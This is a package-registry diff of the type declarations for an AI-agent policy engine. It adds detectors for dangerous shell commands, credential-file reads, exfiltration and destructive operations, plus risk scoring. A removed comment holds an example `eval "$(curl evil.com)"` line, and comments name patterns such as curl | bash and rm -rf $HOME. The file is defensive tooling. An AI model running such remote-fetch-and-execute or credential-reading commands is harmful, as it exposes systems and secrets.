@node9/policy-engine 1.0.0 → 1.5.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/dist/index.d.mts +550 -17
- package/dist/index.d.ts +550 -17
- package/dist/index.js +1160 -59
- package/dist/index.mjs +1129 -59
- package/package.json +2 -2
package/dist/index.d.ts
CHANGED
|
@@ -133,20 +133,6 @@ declare function redactText(text: string): {
|
|
|
133
133
|
found: string[];
|
|
134
134
|
};
|
|
135
135
|
|
|
136
|
-
/**
|
|
137
|
-
* Normalizes a bash command string for policy rule matching by replacing
|
|
138
|
-
* pure-literal quoted strings that follow known message flags (e.g. -m, --body)
|
|
139
|
-
* with empty double-quotes. This prevents text inside commit messages and PR
|
|
140
|
-
* descriptions from triggering shell security rules.
|
|
141
|
-
*
|
|
142
|
-
* Unlike a regex-based approach, this uses the AST so it handles all quoting
|
|
143
|
-
* styles correctly and won't over-strip. Execution flags like -c and -e
|
|
144
|
-
* (psql, node, python) are intentionally left alone so their SQL/code
|
|
145
|
-
* content continues to be evaluated by smart rules.
|
|
146
|
-
*
|
|
147
|
-
* Dynamic content (CmdSubst, ParamExp) inside double-quotes is never stripped
|
|
148
|
-
* so patterns like `eval "$(curl evil.com)"` are always preserved.
|
|
149
|
-
*/
|
|
150
136
|
declare function normalizeCommandForPolicy(command: string): string;
|
|
151
137
|
/**
|
|
152
138
|
* AST-based detection of dangerous shell execution patterns.
|
|
@@ -164,6 +150,22 @@ declare function normalizeCommandForPolicy(command: string): string;
|
|
|
164
150
|
declare function detectDangerousShellExec(command: string): 'block' | 'review' | null;
|
|
165
151
|
/** @deprecated Use detectDangerousShellExec — kept for backwards compatibility */
|
|
166
152
|
declare const detectDangerousEval: typeof detectDangerousShellExec;
|
|
153
|
+
interface FsOpVerdict {
|
|
154
|
+
ruleName: string;
|
|
155
|
+
verdict: 'block' | 'review';
|
|
156
|
+
reason: string;
|
|
157
|
+
/** The actual path argument from the user's command — for explainability. */
|
|
158
|
+
path: string;
|
|
159
|
+
}
|
|
160
|
+
declare const BASH_TOOL_NAMES: Set<string>;
|
|
161
|
+
declare function isBashTool(toolName: string): boolean;
|
|
162
|
+
declare const AST_FS_REGEX_RULES: Set<string>;
|
|
163
|
+
/**
|
|
164
|
+
* True when `rawPath` is under $HOME (~ or absolute /home/* or /root) AND not in
|
|
165
|
+
* the tool-managed cache allow-list. Used to gate `rm -rf` on home paths.
|
|
166
|
+
*/
|
|
167
|
+
declare function isProtectedHomePath(rawPath: string): boolean;
|
|
168
|
+
declare function analyzeFsOperation(command: string): FsOpVerdict | null;
|
|
167
169
|
interface ShellCommandAnalysis {
|
|
168
170
|
/** First word of every CallExpr — the command names invoked. */
|
|
169
171
|
actions: string[];
|
|
@@ -313,7 +315,8 @@ declare function isIgnoredTool(toolName: string, config: PolicyConfig): boolean;
|
|
|
313
315
|
declare function matchesPattern(text: string, patterns: string[] | string): boolean;
|
|
314
316
|
/**
|
|
315
317
|
* Reads `obj.a.b.c` style nested keys. Returns null when any segment is
|
|
316
|
-
* missing.
|
|
318
|
+
* missing, the parent isn't an object, or the path attempts to walk the
|
|
319
|
+
* prototype chain (`__proto__`, `constructor`, `prototype`).
|
|
317
320
|
*/
|
|
318
321
|
declare function getNestedValue(obj: unknown, path: string): unknown;
|
|
319
322
|
/**
|
|
@@ -409,7 +412,537 @@ interface LoopWindowEvaluation {
|
|
|
409
412
|
*/
|
|
410
413
|
declare function evaluateLoopWindow(records: ToolCallRecord[], tool: string, args: unknown, threshold: number, windowMs: number, now: number): LoopWindowEvaluation;
|
|
411
414
|
|
|
415
|
+
/**
|
|
416
|
+
* One finding extracted from a JSONL delta scan. The host produces these
|
|
417
|
+
* per-line; the engine aggregates them into a summary. `lineIndex` is local
|
|
418
|
+
* to the JSONL file and not exfiltrated outside this struct — only the
|
|
419
|
+
* count of findings matters at the workspace level.
|
|
420
|
+
*/
|
|
421
|
+
interface ScanFinding {
|
|
422
|
+
/** sessionId from the Claude Code JSONL line, used to bucket findings. */
|
|
423
|
+
sessionId: string;
|
|
424
|
+
/**
|
|
425
|
+
* What kind of finding. New extractors should add their own type here
|
|
426
|
+
* rather than overloading existing ones.
|
|
427
|
+
*/
|
|
428
|
+
type: 'dlp' | 'pii' | 'sensitive-file-read' | 'privilege-escalation' | 'network-exfil' | 'pipe-to-shell' | 'eval-of-remote' | 'destructive-op' | 'loop' | 'long-output-redacted';
|
|
429
|
+
/** DLP / PII pattern that matched, e.g. "GitHub Token" or "Email". */
|
|
430
|
+
patternName?: string;
|
|
431
|
+
/** Local line index within the source JSONL — never exfiltrated. */
|
|
432
|
+
lineIndex: number;
|
|
433
|
+
}
|
|
434
|
+
/**
|
|
435
|
+
* Per-signal counts. Adding a new signal extractor means adding a new key
|
|
436
|
+
* here; the FE will render it from this dict without code changes once
|
|
437
|
+
* the chart is wired up.
|
|
438
|
+
*/
|
|
439
|
+
interface ScanSignals {
|
|
440
|
+
dlpFindings: number;
|
|
441
|
+
piiFindings: number;
|
|
442
|
+
sensitiveFileReads: number;
|
|
443
|
+
privilegeEscalation: number;
|
|
444
|
+
networkExfil: number;
|
|
445
|
+
pipeToShell: number;
|
|
446
|
+
evalOfRemote: number;
|
|
447
|
+
destructiveOps: number;
|
|
448
|
+
loops: number;
|
|
449
|
+
longOutputRedactions: number;
|
|
450
|
+
}
|
|
451
|
+
/**
|
|
452
|
+
* Compact, network-safe summary of a scan delta. This is the shape the
|
|
453
|
+
* proxy sends to the SaaS on every policy-sync tick. The SaaS persists it
|
|
454
|
+
* per-machine (1:1 with apiKey) and aggregates across the workspace for
|
|
455
|
+
* the dashboard's Recent Exposure card.
|
|
456
|
+
*
|
|
457
|
+
* `score` follows the same 0-100 scale as blast: higher is cleaner. We
|
|
458
|
+
* deduct per finding type based on severity weights (see `computeScanScore`
|
|
459
|
+
* below), capped so a noisy session doesn't bottom out the score on its own.
|
|
460
|
+
*/
|
|
461
|
+
interface ScanSummary {
|
|
462
|
+
/** Number of distinct sessionIds touched by this scan delta. */
|
|
463
|
+
totalSessions: number;
|
|
464
|
+
/** Total tool-call lines parsed across all deltas. */
|
|
465
|
+
totalToolCalls: number;
|
|
466
|
+
/** Per-signal counts. */
|
|
467
|
+
signals: ScanSignals;
|
|
468
|
+
/**
|
|
469
|
+
* Top DLP/PII pattern names by count, descending. Truncated to topN to
|
|
470
|
+
* keep payload small. Only pattern *names*; samples never surface here.
|
|
471
|
+
*/
|
|
472
|
+
topPatterns: Array<{
|
|
473
|
+
patternName: string;
|
|
474
|
+
count: number;
|
|
475
|
+
}>;
|
|
476
|
+
/** 0-100 cleanliness score. */
|
|
477
|
+
score: number;
|
|
478
|
+
}
|
|
479
|
+
/**
|
|
480
|
+
* Per-finding-type score deduction. Tuned so:
|
|
481
|
+
* - One credential leak (-30) drops the score from 100 to 70 — at-risk
|
|
482
|
+
* territory, demands attention.
|
|
483
|
+
* - One destructive op (-15) is a yellow flag.
|
|
484
|
+
* - One loop (-3) is mild noise; many loops still add up.
|
|
485
|
+
* Total deduction is capped at 100 so the score never goes negative.
|
|
486
|
+
*
|
|
487
|
+
* Exported so the SaaS Report can reuse the same severity ladder when
|
|
488
|
+
* blending scan signals into the workspace risk score (see
|
|
489
|
+
* `classifyScanSignal` in ../severity).
|
|
490
|
+
*/
|
|
491
|
+
declare const SCAN_SIGNAL_WEIGHTS: Record<keyof ScanSignals, number>;
|
|
492
|
+
/**
|
|
493
|
+
* Compute the 0-100 cleanliness score. Public so other engine consumers
|
|
494
|
+
* can use the same weights without round-tripping through summarizeScan.
|
|
495
|
+
*/
|
|
496
|
+
declare function computeScanScore(signals: ScanSignals): number;
|
|
497
|
+
declare const LOOP_THRESHOLD_FOR_WASTE = 3;
|
|
498
|
+
declare const COST_PER_LOOP_ITER_USD = 0.006;
|
|
499
|
+
/**
|
|
500
|
+
* Build the network-safe summary from a list of findings + total tool-call
|
|
501
|
+
* count. Deterministic: given the same input the output is identical
|
|
502
|
+
* (important for SaaS-side dedup and ETag-style caching of subsequent
|
|
503
|
+
* tick payloads).
|
|
504
|
+
*
|
|
505
|
+
* Top patterns are sorted by count desc, then alphabetically for stable
|
|
506
|
+
* ordering across calls. topN defaults to 10.
|
|
507
|
+
*/
|
|
508
|
+
declare function summarizeScan(findings: ScanFinding[], opts?: {
|
|
509
|
+
totalToolCalls?: number;
|
|
510
|
+
topN?: number;
|
|
511
|
+
}): ScanSummary;
|
|
512
|
+
|
|
513
|
+
type Severity = 'critical' | 'high' | 'medium';
|
|
514
|
+
type ScoreTier = 'good' | 'at-risk' | 'critical';
|
|
515
|
+
/**
|
|
516
|
+
* Classify a rule by its name + verdict. Used by the proxy when scanning a
|
|
517
|
+
* Claude Code session — the rule that matched is known by name.
|
|
518
|
+
*
|
|
519
|
+
* Tiers:
|
|
520
|
+
* - critical: irreversible damage or credential exfiltration
|
|
521
|
+
* (rm -rf $HOME, eval-of-remote, AWS/SSH/GCP credential reads,
|
|
522
|
+
* repo deletion, helm uninstall, drop-table, drop-database, flushall,
|
|
523
|
+
* curl | bash, pipe-shell)
|
|
524
|
+
* - high: significant damage, recoverable
|
|
525
|
+
* (force push, git reset --hard, rebase, branch deletion, all other
|
|
526
|
+
* block-verdict rules)
|
|
527
|
+
* - medium: workflow / cost risk, not security
|
|
528
|
+
* (rm review, sudo review, redis config-set, dynamic eval, all other
|
|
529
|
+
* review-verdict rules)
|
|
530
|
+
*/
|
|
531
|
+
declare function classifyRuleSeverity(name: string, verdict: 'block' | 'review' | 'allow'): Severity;
|
|
532
|
+
/**
|
|
533
|
+
* Map a rule slug to a friendly label suitable for narrative output.
|
|
534
|
+
*
|
|
535
|
+
* "block-read-aws" → "AWS credentials read"
|
|
536
|
+
* "shield:k8s:block-helm-uninstall" → "helm uninstall"
|
|
537
|
+
* "review-force-push" → "force pushes"
|
|
538
|
+
*
|
|
539
|
+
* Strips common prefixes (block-, review-, allow-, shield:..., org:) before
|
|
540
|
+
* matching, so cloud-tagged rules ("org:block-read-aws") map the same way.
|
|
541
|
+
*/
|
|
542
|
+
declare function narrativeRuleLabel(name: string): string;
|
|
543
|
+
/**
|
|
544
|
+
* Audit-log entry for backend classification. Mirrors the relevant subset of
|
|
545
|
+
* AuditLog rows so backend code can pass them in without a Prisma dependency
|
|
546
|
+
* here.
|
|
547
|
+
*/
|
|
548
|
+
interface AuditEntryForClassify {
|
|
549
|
+
checkedBy?: string | null;
|
|
550
|
+
toolName: string;
|
|
551
|
+
action: string;
|
|
552
|
+
riskMetadata?: {
|
|
553
|
+
ruleName?: string;
|
|
554
|
+
dlpPattern?: string;
|
|
555
|
+
[k: string]: unknown;
|
|
556
|
+
} | null;
|
|
557
|
+
}
|
|
558
|
+
/**
|
|
559
|
+
* Classify a single audit-log entry by what fired and which tool ran. Used by
|
|
560
|
+
* the SaaS /report endpoint to bucket audit events into severity tiers.
|
|
561
|
+
*
|
|
562
|
+
* Resolution order — first hit wins:
|
|
563
|
+
* 1. riskMetadata.ruleName → defer to classifyRuleSeverity (best signal)
|
|
564
|
+
* 2. checkedBy === 'dlp-block' or starts with 'dlp-saas:' → critical
|
|
565
|
+
* (any credential leak is critical regardless of which pattern matched)
|
|
566
|
+
* 3. checkedBy starts with 'eval-saas' or 'pipe-chain-saas:critical' → critical
|
|
567
|
+
* 4. checkedBy === 'loop-detected' → medium (cost / workflow, not security)
|
|
568
|
+
* 5. Block-status entries with no rule name → high (default for unattributed
|
|
569
|
+
* blocks; better than dropping the signal)
|
|
570
|
+
* 6. Otherwise → null (allowed actions don't have a severity)
|
|
571
|
+
*/
|
|
572
|
+
declare function classifyAuditEntry(entry: AuditEntryForClassify): Severity | null;
|
|
573
|
+
/**
|
|
574
|
+
* Compute a 0-100 risk-posture score from severity counts + total events.
|
|
575
|
+
*
|
|
576
|
+
* Heuristic: each severity tier has a "cost" against a clean 100 score.
|
|
577
|
+
* Critical findings deduct the most, medium the least. Counts are normalised
|
|
578
|
+
* by total events so a workspace with 1 critical out of 10 events scores
|
|
579
|
+
* worse than one with 1 critical out of 10,000 — exposure rate matters more
|
|
580
|
+
* than absolute count.
|
|
581
|
+
*
|
|
582
|
+
* Tiers:
|
|
583
|
+
* - good : score ≥ 80
|
|
584
|
+
* - at-risk : 50 ≤ score < 80
|
|
585
|
+
* - critical : score < 50
|
|
586
|
+
*
|
|
587
|
+
* Empty workspaces (total === 0) score 100/good — no evidence of exposure
|
|
588
|
+
* is the only honest answer.
|
|
589
|
+
*/
|
|
590
|
+
declare function computeSecurityScore(opts: {
|
|
591
|
+
critical: number;
|
|
592
|
+
high: number;
|
|
593
|
+
medium: number;
|
|
594
|
+
total: number;
|
|
595
|
+
}): {
|
|
596
|
+
score: number;
|
|
597
|
+
tier: ScoreTier;
|
|
598
|
+
};
|
|
599
|
+
/**
|
|
600
|
+
* Map a ScanSignals key to its severity tier. Uses the existing
|
|
601
|
+
* SCAN_SIGNAL_WEIGHTS so adding a new scan signal type only requires
|
|
602
|
+
* updating the weights table; classification follows automatically.
|
|
603
|
+
*
|
|
604
|
+
* Thresholds:
|
|
605
|
+
* - ≥ 25 → critical (dlpFindings, pipeToShell, evalOfRemote, networkExfil)
|
|
606
|
+
* - ≥ 11 → high (sensitiveFileReads, privilegeEscalation,
|
|
607
|
+
* destructiveOps)
|
|
608
|
+
* - else → medium (piiFindings, loops, longOutputRedactions)
|
|
609
|
+
*/
|
|
610
|
+
declare function classifyScanSignal(key: keyof ScanSignals): Severity;
|
|
611
|
+
/**
|
|
612
|
+
* Compute a 0-100 risk-posture score that blends audit-log severity counts
|
|
613
|
+
* with forward-only scan signal counts.
|
|
614
|
+
*
|
|
615
|
+
* Why this exists: the live audit log answers "what did the firewall block
|
|
616
|
+
* in this window?" and the scan answers "what's sitting in past sessions?".
|
|
617
|
+
* Both are real risk; surfacing them as two separate scores forced users
|
|
618
|
+
* to reconcile two numbers. This function bins scan signals into the same
|
|
619
|
+
* critical/high/medium buckets via classifyScanSignal, sums them with the
|
|
620
|
+
* audit counts, and runs the existing computeSecurityScore math.
|
|
621
|
+
*
|
|
622
|
+
* Denominator handling: a workspace with zero audit traffic but non-zero
|
|
623
|
+
* scan findings would otherwise hit the `total === 0` short-circuit and
|
|
624
|
+
* return 100/good — a false-healthy reading. We add the scan contribution
|
|
625
|
+
* to `total` so the rate-based math runs:
|
|
626
|
+
*
|
|
627
|
+
* - If `scan.totalToolCalls` is provided, use it as the scan-side
|
|
628
|
+
* denominator (best signal — "1 finding per 10000 calls" should
|
|
629
|
+
* score better than "1 per 10").
|
|
630
|
+
* - Otherwise fall back to the count of scan findings, so a scan-only
|
|
631
|
+
* workspace with one credential leak resolves to 1/1 = 100% bad
|
|
632
|
+
* rate and lands in critical, not 0/0 = 100/good.
|
|
633
|
+
*
|
|
634
|
+
* Backwards compatible: calling with `audit` only and no `scan` produces
|
|
635
|
+
* the exact same result as `computeSecurityScore(audit)`.
|
|
636
|
+
*/
|
|
637
|
+
declare function computeBlendedSecurityScore(opts: {
|
|
638
|
+
audit: {
|
|
639
|
+
critical: number;
|
|
640
|
+
high: number;
|
|
641
|
+
medium: number;
|
|
642
|
+
total: number;
|
|
643
|
+
};
|
|
644
|
+
scan?: {
|
|
645
|
+
signals: ScanSignals;
|
|
646
|
+
totalToolCalls?: number;
|
|
647
|
+
};
|
|
648
|
+
}): {
|
|
649
|
+
score: number;
|
|
650
|
+
tier: ScoreTier;
|
|
651
|
+
};
|
|
652
|
+
|
|
653
|
+
/**
|
|
654
|
+
* One sensitive path that the blast walker found readable on disk.
|
|
655
|
+
* `score` is the per-finding deduction this path contributes to the
|
|
656
|
+
* machine's overall blast-radius score (100 = clean).
|
|
657
|
+
*/
|
|
658
|
+
interface BlastFinding {
|
|
659
|
+
/** Path on disk — absolute, or home-relative ("~/.aws/credentials"). */
|
|
660
|
+
full: string;
|
|
661
|
+
/** Display label — short form for UI ("~/.ssh/id_rsa", ".env (cwd)"). */
|
|
662
|
+
label: string;
|
|
663
|
+
/** One-line explanation of why this path matters. */
|
|
664
|
+
description: string;
|
|
665
|
+
/** Points deducted from the 100-point score when this path is reachable. */
|
|
666
|
+
score: number;
|
|
667
|
+
}
|
|
668
|
+
/** One environment variable the DLP scanner flagged as a credential. */
|
|
669
|
+
interface BlastEnvFinding {
|
|
670
|
+
/** Variable name, e.g. "AWS_SECRET_ACCESS_KEY". */
|
|
671
|
+
key: string;
|
|
672
|
+
/** DLP pattern that matched, e.g. "AWS Access Key". */
|
|
673
|
+
patternName: string;
|
|
674
|
+
}
|
|
675
|
+
/** Full result of a blast walk on one machine. */
|
|
676
|
+
interface BlastResult {
|
|
677
|
+
reachable: BlastFinding[];
|
|
678
|
+
envFindings: BlastEnvFinding[];
|
|
679
|
+
/** 0-100. Higher is better. */
|
|
680
|
+
score: number;
|
|
681
|
+
}
|
|
682
|
+
/**
|
|
683
|
+
* Compact, network-safe summary of a blast result. This is the shape the
|
|
684
|
+
* proxy sends to the SaaS and the SaaS persists per machine. We deliberately
|
|
685
|
+
* DO NOT send file contents, full paths, or sample values — only:
|
|
686
|
+
* - the score (already aggregate)
|
|
687
|
+
* - a count of how many things were exposed
|
|
688
|
+
* - the top-N worst paths' sanitised labels (truncated to 2 segments)
|
|
689
|
+
*
|
|
690
|
+
* The sanitisation step lives here in the engine so both the proxy (before
|
|
691
|
+
* send) and the SaaS (when validating) reference identical logic.
|
|
692
|
+
*/
|
|
693
|
+
interface BlastSummary {
|
|
694
|
+
/** 0-100. Same as BlastResult.score. */
|
|
695
|
+
score: number;
|
|
696
|
+
/** reachable.length + envFindings.length — total exposure count. */
|
|
697
|
+
exposureCount: number;
|
|
698
|
+
/**
|
|
699
|
+
* Top-N worst findings (sorted by individual score deduction desc).
|
|
700
|
+
* Paths are truncated to the last 2 segments so we never exfiltrate the
|
|
701
|
+
* home directory or project layout — only the basename + parent survive
|
|
702
|
+
* (e.g. "/Users/alice/Code/payments-prod/.env.production" →
|
|
703
|
+
* "payments-prod/.env.production"; paths of ≤2 segments are kept as-is).
|
|
704
|
+
*/
|
|
705
|
+
worstPaths: Array<{
|
|
706
|
+
path: string;
|
|
707
|
+
score: number;
|
|
708
|
+
}>;
|
|
709
|
+
/** Number of env vars flagged as credentials. No keys included. */
|
|
710
|
+
envExposureCount: number;
|
|
711
|
+
}
|
|
712
|
+
/**
|
|
713
|
+
* Sanitise a sensitive path for transmission. Keeps only the trailing 2
|
|
714
|
+
* segments — enough to identify the kind of file ("~/.aws/credentials"
|
|
715
|
+
* stays useful, "/Users/alice/Code/payments-prod/.env" becomes
|
|
716
|
+
* "payments-prod/.env" which doesn't reveal the home dir or directory tree).
|
|
717
|
+
*
|
|
718
|
+
* Edge cases:
|
|
719
|
+
* - Already short paths (≤2 segments) are returned as-is.
|
|
720
|
+
* - Paths with a leading "~" are kept as-is up to 2 segments.
|
|
721
|
+
* - Empty strings return "".
|
|
722
|
+
*
|
|
723
|
+
* Exported for unit tests + reuse anywhere a path needs the same treatment.
|
|
724
|
+
*/
|
|
725
|
+
declare function truncateBlastPath(full: string): string;
|
|
726
|
+
/**
|
|
727
|
+
* Build the network-safe summary from a full BlastResult. Deterministic:
|
|
728
|
+
* given the same input the output is identical (important for caching /
|
|
729
|
+
* deduplication on the SaaS side). Top-N defaults to 5, configurable for
|
|
730
|
+
* tests.
|
|
731
|
+
*/
|
|
732
|
+
declare function summarizeBlast(result: BlastResult, opts?: {
|
|
733
|
+
topN?: number;
|
|
734
|
+
}): BlastSummary;
|
|
735
|
+
|
|
736
|
+
/**
|
|
737
|
+
* Destructive-op regex. Word-boundary anchored so partial matches don't
|
|
738
|
+
* fire (e.g. the "rm" inside "terminate" doesn't match `\brm\b`). Each
|
|
739
|
+
* pattern is independently provable as destructive — no fuzzy heuristics.
|
|
740
|
+
*/
|
|
741
|
+
declare const DESTRUCTIVE_OP_RE: RegExp;
|
|
742
|
+
/**
|
|
743
|
+
* Historical privilege-escalation regex. **No longer used by the canonical
|
|
744
|
+
* detector** — scan/canonical.ts moved sudo/su, chmod, and chown all to
|
|
745
|
+
* AST tokenization (analyzeShellCommand actions + allTokens) so:
|
|
746
|
+
* - Quoting bypasses (`s''udo`, `c\hmod`) don't slip past the matcher.
|
|
747
|
+
* - String literals like `echo "chmod 777 done"` or `cat /etc/sudoers`
|
|
748
|
+
* stop firing false positives — those don't put the action name in
|
|
749
|
+
* `actions`, only in `allTokens` (a Lit, not a CallExpr first-word).
|
|
750
|
+
*
|
|
751
|
+
* Kept as a public export for non-AST consumers that grep raw command
|
|
752
|
+
* strings (smart-rule conditions that match on the literal command text)
|
|
753
|
+
* and as documentation of the historical pattern set. Removing it would
|
|
754
|
+
* be a breaking change for downstream package consumers.
|
|
755
|
+
*/
|
|
756
|
+
declare const PRIVILEGE_ESCALATION_RE: RegExp;
|
|
757
|
+
/**
|
|
758
|
+
* Sensitive file paths the agent shouldn't be reading via tool calls.
|
|
759
|
+
* Mirrors the blast walker's path set — same files matter, here detected
|
|
760
|
+
* at tool-call-time rather than fs-walk-time.
|
|
761
|
+
*
|
|
762
|
+
* `\b` boundaries on names so substring noise doesn't trigger; the
|
|
763
|
+
* patterns assume the proxy normalises ~ in inputs (which it does
|
|
764
|
+
* via path expansion before we see them).
|
|
765
|
+
*/
|
|
766
|
+
declare const SENSITIVE_PATH_RE: RegExp;
|
|
767
|
+
/**
|
|
768
|
+
* Tool names that read or grep file contents. Used to gate SENSITIVE_PATH_RE
|
|
769
|
+
* to file-reading tools so the same path appearing in a Bash command doesn't
|
|
770
|
+
* double-count against a Read of the same file.
|
|
771
|
+
*/
|
|
772
|
+
declare const FILE_TOOLS: Set<string>;
|
|
773
|
+
|
|
774
|
+
type PiiPattern = 'Email' | 'SSN' | 'Phone' | 'Credit Card';
|
|
775
|
+
/**
|
|
776
|
+
* Detect PII patterns in a string. Returns a deduplicated list — one entry
|
|
777
|
+
* per distinct pattern type, never multiple "Email" findings from one input.
|
|
778
|
+
*/
|
|
779
|
+
declare function detectPii(text: string): PiiPattern[];
|
|
780
|
+
|
|
781
|
+
type CanonicalFindingType = 'smart-rule' | 'ast-fs-op' | 'dlp' | 'pii' | 'sensitive-file-read' | 'privilege-escalation' | 'destructive-op' | 'pipe-to-shell' | 'eval-of-remote' | 'loop' | 'long-output-redacted';
|
|
782
|
+
type CanonicalAgent = 'claude' | 'gemini' | 'codex' | 'shell';
|
|
783
|
+
type CanonicalSourceType = 'default' | 'shield' | 'user' | 'engine';
|
|
784
|
+
interface CanonicalFinding {
|
|
785
|
+
/** Discriminator. Maps to ScanFinding.type for the SaaS upload; 'smart-rule' and 'ast-fs-op' have no ScanFinding bucket (toScanFinding returns null). */
|
|
786
|
+
type: CanonicalFindingType;
|
|
787
|
+
/**
|
|
788
|
+
* Stable rule identifier. For type='smart-rule' / 'ast-fs-op' it's the
|
|
789
|
+
* rule name (e.g. 'block-rm-rf-home', 'shield:project-jail:block-read-ssh').
|
|
790
|
+
* For built-in detector findings (PII, DLP, regex), a synthetic name keyed
|
|
791
|
+
* on the detector + pattern (e.g. 'pii:email', 'dlp:GitHub Token').
|
|
792
|
+
*/
|
|
793
|
+
ruleName: string;
|
|
794
|
+
/** Block or review. Findings only exist for fired rules — no allow/info. */
|
|
795
|
+
verdict: 'block' | 'review';
|
|
796
|
+
/** Severity tier. Single source of truth — produced once at the engine. */
|
|
797
|
+
severity: Severity;
|
|
798
|
+
/** Engine-generated reason. Never carries user PII or raw secrets. */
|
|
799
|
+
reason: string;
|
|
800
|
+
/** Pattern name for DLP/PII (e.g. 'GitHub Token', 'Email'). */
|
|
801
|
+
patternName?: string;
|
|
802
|
+
/** Tool that produced the call. */
|
|
803
|
+
toolName: string;
|
|
804
|
+
agent: CanonicalAgent;
|
|
805
|
+
sessionId: string;
|
|
806
|
+
/** Project label or working directory the session lives in. */
|
|
807
|
+
project: string;
|
|
808
|
+
/** Local JSONL line offset. Never exfiltrated; used for dedupe. */
|
|
809
|
+
lineIndex: number;
|
|
810
|
+
/** Where the rule came from. 'engine' for built-in detectors. */
|
|
811
|
+
sourceType: CanonicalSourceType;
|
|
812
|
+
/** Optional shield/source label for UI. */
|
|
813
|
+
shieldLabel?: string;
|
|
814
|
+
/** When this exact (post-dedupe) finding was first / last seen. */
|
|
815
|
+
firstSeenAt: string;
|
|
816
|
+
lastSeenAt: string;
|
|
817
|
+
/** Post-dedupe match count. 1 by default, N for N collapsed raw matches. */
|
|
818
|
+
occurrenceCount: number;
|
|
819
|
+
/** AST findings: the path that triggered the verdict. */
|
|
820
|
+
subjectPath?: string;
|
|
821
|
+
/** Loop findings: dollar cost so far. Loop-only today; optional everywhere. */
|
|
822
|
+
costUsd?: number;
|
|
823
|
+
/** Loop findings: number of iterations. */
|
|
824
|
+
loopCount?: number;
|
|
825
|
+
loopKind?: 'loop' | 'long-iteration';
|
|
826
|
+
/** Loop findings: a sanitized command preview for UI. */
|
|
827
|
+
commandPreview?: string;
|
|
828
|
+
/** Raw tool input. Local CLI render only. */
|
|
829
|
+
input?: Record<string, unknown>;
|
|
830
|
+
/** DLP UI: first/last chars of the matched value with the middle replaced. */
|
|
831
|
+
redactedSample?: string;
|
|
832
|
+
}
|
|
833
|
+
/**
|
|
834
|
+
* Normalized per-call entry the per-line extractor consumes. Hosts (CLI
|
|
835
|
+
* scan, daemon, backfill) parse agent-specific JSONL into this shape so
|
|
836
|
+
* extractCanonicalFindings doesn't have to know about Claude vs Gemini vs
|
|
837
|
+
* Codex line layouts.
|
|
838
|
+
*/
|
|
839
|
+
interface ToolCallEntry {
|
|
840
|
+
toolName: string;
|
|
841
|
+
args: Record<string, unknown>;
|
|
842
|
+
timestamp: string;
|
|
843
|
+
/** Bytes of tool result content for long-output detection. 0 / undefined
|
|
844
|
+
* for non-result entries. */
|
|
845
|
+
outputBytes?: number;
|
|
846
|
+
}
|
|
847
|
+
interface ExtractContext {
|
|
848
|
+
sessionId: string;
|
|
849
|
+
lineIndex: number;
|
|
850
|
+
project: string;
|
|
851
|
+
agent: CanonicalAgent;
|
|
852
|
+
rules: ReadonlyArray<{
|
|
853
|
+
rule: SmartRule;
|
|
854
|
+
sourceType: CanonicalSourceType;
|
|
855
|
+
shieldLabel?: string;
|
|
856
|
+
}>;
|
|
857
|
+
/** toolInspection map from PolicyConfig — drives shell-command extraction
|
|
858
|
+
* for tools that aren't the standard 'bash' name. Defaults handled by caller. */
|
|
859
|
+
toolInspection: Record<string, string>;
|
|
860
|
+
/** DLP enabled flag from PolicyConfig. */
|
|
861
|
+
dlpEnabled: boolean;
|
|
862
|
+
}
|
|
863
|
+
interface SessionExtractContext {
|
|
864
|
+
sessionId: string;
|
|
865
|
+
project: string;
|
|
866
|
+
agent: CanonicalAgent;
|
|
867
|
+
/**
|
|
868
|
+
* Loop-detection window settings. Mirrors PolicyConfig.policy.loopDetection.
|
|
869
|
+
*
|
|
870
|
+
* `windowSeconds: 0` means "no window" — count all matching calls in the
|
|
871
|
+
* session regardless of timing. This is the right setting for historical
|
|
872
|
+
* backfill (--upload-history): an agent that hammered the same Edit on
|
|
873
|
+
* the same file 126 times across hours is the loop pattern users care
|
|
874
|
+
* about, but a 120s window would never fire on it. The live hook keeps
|
|
875
|
+
* the small window because it's racing against an actively running agent.
|
|
876
|
+
*/
|
|
877
|
+
loopDetection: {
|
|
878
|
+
enabled: boolean;
|
|
879
|
+
threshold: number;
|
|
880
|
+
windowSeconds: number;
|
|
881
|
+
};
|
|
882
|
+
}
|
|
883
|
+
interface SessionToolCall extends ToolCallEntry {
|
|
884
|
+
/** Local JSONL line where this call lived — propagates to the loop finding. */
|
|
885
|
+
lineIndex: number;
|
|
886
|
+
}
|
|
887
|
+
declare const LONG_OUTPUT_THRESHOLD_BYTES: number;
|
|
888
|
+
/**
|
|
889
|
+
* Wire-format identity of the canonical detector pipeline. Bumped when
|
|
890
|
+
* extractCanonicalFindings (and friends) change their output in a way
|
|
891
|
+
* that would invalidate verdicts already recorded against the previous
|
|
892
|
+
* version. The daemon stores this in ~/.node9/scan-watermark.json and
|
|
893
|
+
* triggers a one-time re-scan when its persisted value falls behind.
|
|
894
|
+
*
|
|
895
|
+
* Bump it when:
|
|
896
|
+
* - adding/removing a CanonicalFindingType
|
|
897
|
+
* - changing severity classification for an existing type
|
|
898
|
+
* - changing dedupe keys (would silently re-bucket existing findings)
|
|
899
|
+
* - any semantic change to the detectors that affects emitted counts
|
|
900
|
+
*
|
|
901
|
+
* Don't bump for:
|
|
902
|
+
* - comment-only edits
|
|
903
|
+
* - jsdoc tweaks
|
|
904
|
+
* - refactors that demonstrably preserve output
|
|
905
|
+
*
|
|
906
|
+
* scripts/check-extractor-version.mjs hashes the detector source files
|
|
907
|
+
* and fails CI when the hash drifts without a version bump — forgetting
|
|
908
|
+
* is loud, not silent.
|
|
909
|
+
*/
|
|
910
|
+
declare const CANONICAL_EXTRACTOR_VERSION = "canonical-v4";
|
|
911
|
+
/**
|
|
912
|
+
* SHA-256 prefix of the detector-source files
|
|
913
|
+
* (canonical.ts + pii.ts + destructive-regex.ts).
|
|
914
|
+
*
|
|
915
|
+
* Updated by `npm run bump-extractor-version`. The CI gate in
|
|
916
|
+
* `.github/workflows/ci.yml` recomputes the hash on every push and fails
|
|
917
|
+
* if it doesn't match this constant — the contract is "if any of those
|
|
918
|
+
* files changed, this hash must change too, and you must consciously
|
|
919
|
+
* decide whether to bump CANONICAL_EXTRACTOR_VERSION."
|
|
920
|
+
*/
|
|
921
|
+
declare const CANONICAL_EXTRACTOR_HASH = "64a6a63a27f4646f";
|
|
922
|
+
